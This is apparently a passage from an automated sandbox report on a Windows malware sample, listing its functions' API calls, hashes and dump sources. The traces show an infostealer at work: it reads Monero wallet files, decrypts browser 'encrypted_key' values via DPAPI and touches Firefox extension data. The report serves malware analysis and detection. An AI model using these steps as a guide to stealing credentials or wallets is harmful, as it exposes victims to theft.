                                • Part of subcall function 0086A9B0: lstrcpy.KERNEL32(00000000), ref: 0086AA04
                                • Part of subcall function 0086A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0086AA12
                                • Part of subcall function 0086A8A0: lstrcpy.KERNEL32(?,00870E17), ref: 0086A905
                                • Part of subcall function 00868B60: GetSystemTime.KERNEL32(00870E1A,015CA088,008705AE,?,?,008513F9,?,0000001A,00870E1A,00000000,?,015C8AA0,?,\Monero\wallet.keys,00870E17), ref: 00868B86
                                • Part of subcall function 0086A920: lstrcpy.KERNEL32(00000000,?), ref: 0086A972
                                • Part of subcall function 0086A920: lstrcat.KERNEL32(00000000), ref: 0086A982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0085D481
                              • lstrlen.KERNEL32(00000000), ref: 0085D698
                              • lstrlen.KERNEL32(00000000), ref: 0085D6AC
                              • DeleteFileA.KERNEL32(00000000), ref: 0085D72B
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              • Associated: 00000001.00000002.1471254512.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000901000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000AAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D57000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472073993.0000000000D58000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472257619.0000000000EFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472288268.0000000000EFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                              • String ID:
                              • API String ID: 211194620-0
                              • Opcode ID: ce12f22ac63ceeb0c8e6074203eadd23b532e1f458ed5eb60a2db19df183d9bc
                              • Instruction ID: 9d8f61f321e8942ce80f1f9c51c14cd4822a3720c4aa756235bdea14969203e8
                              • Opcode Fuzzy Hash: ce12f22ac63ceeb0c8e6074203eadd23b532e1f458ed5eb60a2db19df183d9bc
                              • Instruction Fuzzy Hash: 0A91BA729101189ADB08EBA8DD96AEE7339FF24300F514169F516F6091EF346A09CFA3
                              Function 0085D780 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0086A740: lstrcpy.KERNEL32(00870E17,00000000), ref: 0086A788
                                • Part of subcall function 0086A9B0: lstrlen.KERNEL32(?,015C8AA0,?,\Monero\wallet.keys,00870E17), ref: 0086A9C5
                                • Part of subcall function 0086A9B0: lstrcpy.KERNEL32(00000000), ref: 0086AA04
                                • Part of subcall function 0086A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0086AA12
                                • Part of subcall function 0086A8A0: lstrcpy.KERNEL32(?,00870E17), ref: 0086A905
                                • Part of subcall function 00868B60: GetSystemTime.KERNEL32(00870E1A,015CA088,008705AE,?,?,008513F9,?,0000001A,00870E1A,00000000,?,015C8AA0,?,\Monero\wallet.keys,00870E17), ref: 00868B86
                                • Part of subcall function 0086A920: lstrcpy.KERNEL32(00000000,?), ref: 0086A972
                                • Part of subcall function 0086A920: lstrcat.KERNEL32(00000000), ref: 0086A982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0085D801
                              • lstrlen.KERNEL32(00000000), ref: 0085D99F
                              • lstrlen.KERNEL32(00000000), ref: 0085D9B3
                              • DeleteFileA.KERNEL32(00000000), ref: 0085DA32
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              • Associated: 00000001.00000002.1471254512.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000901000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000AAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D57000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472073993.0000000000D58000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472257619.0000000000EFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472288268.0000000000EFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                              • String ID:
                              • API String ID: 211194620-0
                              • Opcode ID: 3bc0d27903314a055a10b496d072d23d07729d641905a48d2ecd2399476d9eb3
                              • Instruction ID: 3cd5c244c8b347a02c8408d9750bbc10f819aacd2fbc74e16b89407ed680255f
                              • Opcode Fuzzy Hash: 3bc0d27903314a055a10b496d072d23d07729d641905a48d2ecd2399476d9eb3
                              • Instruction Fuzzy Hash: 3A81C9729101189ACB08FBA8DD96EEE7339FF64301F514129F516F6091EE346A09CFA3
                              Function 0085F4A0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0086A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0086A7E6
                                • Part of subcall function 008599C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 008599EC
                                • Part of subcall function 008599C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00859A11
                                • Part of subcall function 008599C0: LocalAlloc.KERNEL32(00000040,?), ref: 00859A31
                                • Part of subcall function 008599C0: ReadFile.KERNEL32(000000FF,?,00000000,0085148F,00000000), ref: 00859A5A
                                • Part of subcall function 008599C0: LocalFree.KERNEL32(0085148F), ref: 00859A90
                                • Part of subcall function 008599C0: CloseHandle.KERNEL32(000000FF), ref: 00859A9A
                                • Part of subcall function 00868E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00868E52
                                • Part of subcall function 0086A740: lstrcpy.KERNEL32(00870E17,00000000), ref: 0086A788
                                • Part of subcall function 0086A9B0: lstrlen.KERNEL32(?,015C8AA0,?,\Monero\wallet.keys,00870E17), ref: 0086A9C5
                                • Part of subcall function 0086A9B0: lstrcpy.KERNEL32(00000000), ref: 0086AA04
                                • Part of subcall function 0086A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0086AA12
                                • Part of subcall function 0086A8A0: lstrcpy.KERNEL32(?,00870E17), ref: 0086A905
                                • Part of subcall function 0086A920: lstrcpy.KERNEL32(00000000,?), ref: 0086A972
                                • Part of subcall function 0086A920: lstrcat.KERNEL32(00000000), ref: 0086A982
                              • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00871580,00870D92), ref: 0085F54C
                              • lstrlen.KERNEL32(00000000), ref: 0085F56B
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              • Associated: 00000001.00000002.1471254512.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000901000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000AAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D57000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472073993.0000000000D58000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472257619.0000000000EFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472288268.0000000000EFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                              • String ID: ^userContextId=4294967295$moz-extension+++
                              • API String ID: 998311485-3310892237
                              • Opcode ID: 3853fc7ef370b8349ef14becd11ecdf99a9925e18b5c51a5b6d1c55eff7d4e2d
                              • Instruction ID: 4fd514c1819b9b8acc3ae6bd8cb6a396782c8c3a0825ec7a2d8dd91a17ac64ce
                              • Opcode Fuzzy Hash: 3853fc7ef370b8349ef14becd11ecdf99a9925e18b5c51a5b6d1c55eff7d4e2d
                              • Instruction Fuzzy Hash: F551F971910108AADB08FBA8DC96DEE7779FF54300F518528F916E7191EE346A09CFA3
                              Function 00863560 Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              • Associated: 00000001.00000002.1471254512.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000901000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000AAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D57000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472073993.0000000000D58000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472257619.0000000000EFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472288268.0000000000EFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen
                              • String ID:
                              • API String ID: 367037083-0
                              • Opcode ID: 83651212c73c29da471ee37373cd78998dcb3aad61e58334bcfa139a31cf75b7
                              • Instruction ID: ff83060374672d903bffd1ef834492bb9c839f4dae1ad09b266d6faa0fbf9734
                              • Opcode Fuzzy Hash: 83651212c73c29da471ee37373cd78998dcb3aad61e58334bcfa139a31cf75b7
                              • Instruction Fuzzy Hash: 73413CB1D10109EBCB08EFE4D895AEEB774FB54704F018029E416B7291EB75AA05DFA2
                              Function 00859CE0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0086A740: lstrcpy.KERNEL32(00870E17,00000000), ref: 0086A788
                                • Part of subcall function 008599C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 008599EC
                                • Part of subcall function 008599C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00859A11
                                • Part of subcall function 008599C0: LocalAlloc.KERNEL32(00000040,?), ref: 00859A31
                                • Part of subcall function 008599C0: ReadFile.KERNEL32(000000FF,?,00000000,0085148F,00000000), ref: 00859A5A
                                • Part of subcall function 008599C0: LocalFree.KERNEL32(0085148F), ref: 00859A90
                                • Part of subcall function 008599C0: CloseHandle.KERNEL32(000000FF), ref: 00859A9A
                                • Part of subcall function 00868E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00868E52
                              • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00859D39
                                • Part of subcall function 00859AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00854EEE,00000000,00000000), ref: 00859AEF
                                • Part of subcall function 00859AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00854EEE,00000000,?), ref: 00859B01
                                • Part of subcall function 00859AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00854EEE,00000000,00000000), ref: 00859B2A
                                • Part of subcall function 00859AC0: LocalFree.KERNEL32(?,?,?,?,00854EEE,00000000,?), ref: 00859B3F
                                • Part of subcall function 00859B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00859B84
                                • Part of subcall function 00859B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00859BA3
                                • Part of subcall function 00859B60: LocalFree.KERNEL32(?), ref: 00859BD3
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              • Associated: 00000001.00000002.1471254512.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000901000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000AAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D57000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472073993.0000000000D58000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472257619.0000000000EFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472288268.0000000000EFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                              • String ID: $"encrypted_key":"$DPAPI
                              • API String ID: 2100535398-738592651
                              • Opcode ID: d1889434f1f0aec8957cd74e06396f7104b608ebc9ff11f81ae462a2540c1dc7
                              • Instruction ID: 95aa3058629cea4c484efe279100b8e918f64c92f3cb19d20267e7e4252648fa
                              • Opcode Fuzzy Hash: d1889434f1f0aec8957cd74e06396f7104b608ebc9ff11f81ae462a2540c1dc7
                              • Instruction Fuzzy Hash: E93110B5D10209EBCF14DFE8DC85AEE77B8FB48305F144519E955E7241EB349A08CBA1
                              Function 008694D0 Relevance: 6.1, APIs: 4, Instructions: 89COMMON
                              Download Yara Rule
                              APIs
                              • memset.MSVCRT ref: 008694EB
                                • Part of subcall function 00868D50: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0086951E,00000000), ref: 00868D5B
                                • Part of subcall function 00868D50: RtlAllocateHeap.NTDLL(00000000), ref: 00868D62
                                • Part of subcall function 00868D50: wsprintfW.USER32 ref: 00868D78
                              • OpenProcess.KERNEL32(00001001,00000000,?), ref: 008695AB
                              • TerminateProcess.KERNEL32(00000000,00000000), ref: 008695C9
                              • CloseHandle.KERNEL32(00000000), ref: 008695D6
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              • Associated: 00000001.00000002.1471254512.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000901000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000AAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D57000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472073993.0000000000D58000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472257619.0000000000EFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472288268.0000000000EFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                              • String ID:
                              • API String ID: 3729781310-0
                              • Opcode ID: 5e39e3c91035ce85a10f7f20097158f104e68bf39aacd5e5d31c47e27cbba732
                              • Instruction ID: 0f6b4b52c53aa42b17f32d5b432cbdc084e190e3dab5c6a4ead749c784b30fbe
                              • Opcode Fuzzy Hash: 5e39e3c91035ce85a10f7f20097158f104e68bf39aacd5e5d31c47e27cbba732
                              • Instruction Fuzzy Hash: 4A311B71A002189BDB14DBD4CD49BEDB778FB54300F10445AE506AB184DF74AA8ACB92
                              Function 008692E0 Relevance: 6.0, APIs: 4, Instructions: 39fileCOMMON
                              Download Yara Rule
                              APIs
                              • CreateFileA.KERNEL32(00863AEE,80000000,00000003,00000000,00000003,00000080,00000000,?,00863AEE,?), ref: 008692FC
                              • GetFileSizeEx.KERNEL32(000000FF,00863AEE), ref: 00869319
                              • CloseHandle.KERNEL32(000000FF), ref: 00869327
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              • Associated: 00000001.00000002.1471254512.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000901000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000AAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D57000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472073993.0000000000D58000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472257619.0000000000EFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472288268.0000000000EFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$CloseCreateHandleSize
                              • String ID:
                              • API String ID: 1378416451-0
                              • Opcode ID: 53ba9975913cec115c9cad4cc920cf030e2820ac25c73fbc9b4b3262999dde3d
                              • Instruction ID: dae3a250f8660e878b3ee0d42ef33aa4eb75be64f6876d8ab8b73f63ade37a9b
                              • Opcode Fuzzy Hash: 53ba9975913cec115c9cad4cc920cf030e2820ac25c73fbc9b4b3262999dde3d
                              • Instruction Fuzzy Hash: F6F01935F40208ABDB10DBE0DD49B9E77B9EB58710F118255FA51E72C0DA7096018B80
                              Function 0086C742 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              • __getptd.LIBCMT ref: 0086C74E
                                • Part of subcall function 0086BF9F: __amsg_exit.LIBCMT ref: 0086BFAF
                              • __getptd.LIBCMT ref: 0086C765
                              • __amsg_exit.LIBCMT ref: 0086C773
                              • __updatetlocinfoEx_nolock.LIBCMT ref: 0086C797
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              • Associated: 00000001.00000002.1471254512.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000901000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000AAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D57000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472073993.0000000000D58000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472257619.0000000000EFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472288268.0000000000EFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                              • String ID:
                              • API String ID: 300741435-0
                              • Opcode ID: e8cfa656b1383ebd23ddee1da2d5e9888c77a88a169ef932663cd10b27e6631f
                              • Instruction ID: cbcb4c2d6895276c5b72754524860574dde8d61ed77a7315ca36974cec46c6ef
                              • Opcode Fuzzy Hash: e8cfa656b1383ebd23ddee1da2d5e9888c77a88a169ef932663cd10b27e6631f
                              • Instruction Fuzzy Hash: 8CF0B4329057109BD724BBBC9807B6E33A1FF00728F234149F554EA1D2DF6499819F5B
                              Function 00864F40 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00868DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00868E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 00864F7A
                              • lstrcat.KERNEL32(?,00871070), ref: 00864F97
                              • lstrcat.KERNEL32(?,015C8B00), ref: 00864FAB
                              • lstrcat.KERNEL32(?,00871074), ref: 00864FBD
                                • Part of subcall function 00864910: wsprintfA.USER32 ref: 0086492C
                                • Part of subcall function 00864910: FindFirstFileA.KERNEL32(?,?), ref: 00864943
                                • Part of subcall function 00864910: StrCmpCA.SHLWAPI(?,00870FDC), ref: 00864971
                                • Part of subcall function 00864910: StrCmpCA.SHLWAPI(?,00870FE0), ref: 00864987
                                • Part of subcall function 00864910: FindNextFileA.KERNEL32(000000FF,?), ref: 00864B7D
                                • Part of subcall function 00864910: FindClose.KERNEL32(000000FF), ref: 00864B92
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              • Associated: 00000001.00000002.1471254512.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000901000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000AAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D57000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472073993.0000000000D58000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472257619.0000000000EFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472288268.0000000000EFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                              • String ID:
                              • API String ID: 2667927680-0
                              • Opcode ID: b0d6d98d32ecf0a65a6453851de14ef4502f61a6e5c70fd08c073004ef6273a9
                              • Instruction ID: 3eb595b5c852024bdb401053f1a1d546d4f7d44fe6c6eb26952399391a89c2e1
                              • Opcode Fuzzy Hash: b0d6d98d32ecf0a65a6453851de14ef4502f61a6e5c70fd08c073004ef6273a9
